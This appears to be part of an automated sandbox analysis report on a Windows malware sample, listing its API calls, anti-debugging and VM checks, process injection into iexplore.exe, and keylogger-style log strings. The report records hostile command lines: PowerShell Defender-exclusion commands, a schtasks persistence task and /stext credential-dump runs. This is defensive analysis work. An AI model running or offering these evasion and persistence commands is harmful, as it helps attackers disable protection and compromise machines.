                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe TID: 8108 - Thread sleep time: -11115000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe TID: 8108 - Thread sleep time: -17466000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040928E
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C322
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Code function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407CD2
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Code function: 16_2_00418981 memset,GetSystemInfo,16_2_00418981
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.000000000175C000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
                      Source: bhvD3AB.tmp.16.dr - Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1995908701.00000000078A7000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}J-4W
                      Source: bhvD3AB.tmp.16.dr - Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - API call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Process information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Process queried: DebugPort
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_00443355 mov eax, dword ptr fs:[00000030h] 8_2_00443355
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Code function: 14_2_10004AB4 mov eax, dword ptr fs:[00000030h] 14_2_10004AB4
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_004120B2 GetProcessHeap,HeapFree,8_2_004120B2
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0043503C
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0043BB71
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_00434BD8 SetUnhandledExceptionFilter,8_2_00434BD8
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Code function: 14_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_100060E2
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Code function: 14_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_10002639
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Code function: 14_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_10002B1C
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,8_2_0041812A
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Memory written: C:\Users\user\Desktop\LdSbZG1iH6.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Memory written: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Section loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: execute and read and write
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Section loaded: NULL target: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2D40008
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 8_2_00412132
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_00419662 mouse_event,8_2_00419662
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Process created: C:\Users\user\Desktop\LdSbZG1iH6.exe "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\xgyrrizik"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\ijdkrtkjyyuu"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe - Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\sdjcslvdtgmhffr"
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram Manager\logs.dat
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram Managerenh.dlltz~f
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910311868.0000000004B62000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram Manager>g
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\stuvwx
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001732000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\B
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\=
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Managerr|
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\{
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\|
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\er
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Managerger
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram Manager\logs.dat6~"
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910311868.0000000004B62000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\s
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\er3
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\4
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\/
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\n
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, logs.dat.14.dr - Binary or memory string: [Program Manager]
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram Manager
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\e
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\&
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram Manager292437dll
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram Manager@gc
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram Manager\logs.datn~J
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram Manager\logs.datL~l
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram Managerenh.dllF~r
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001732000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: |Program Manager|
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: dProgram ManagerX~x
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2910293192.0000000004A70000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager9Y\P
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001732000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager:S
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: 8_2_00434CB6 cpuid 8_2_00434CB6
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: EnumSystemLocalesW,8_2_0045201B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: EnumSystemLocalesW,8_2_004520B6
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00452143
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: GetLocaleInfoW,8_2_00452393
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: EnumSystemLocalesW,8_2_00448484
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_004524BC
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: GetLocaleInfoW,8_2_004525C3
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00452690
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: GetLocaleInfoW,8_2_0044896D
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: GetLocaleInfoA,8_2_0040F90C
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00451D58
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Code function: EnumSystemLocalesW,8_2_00451FD0
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Queries volume information: C:\Users\user\Desktop\LdSbZG1iH6.exe VolumeInformation
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe - Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
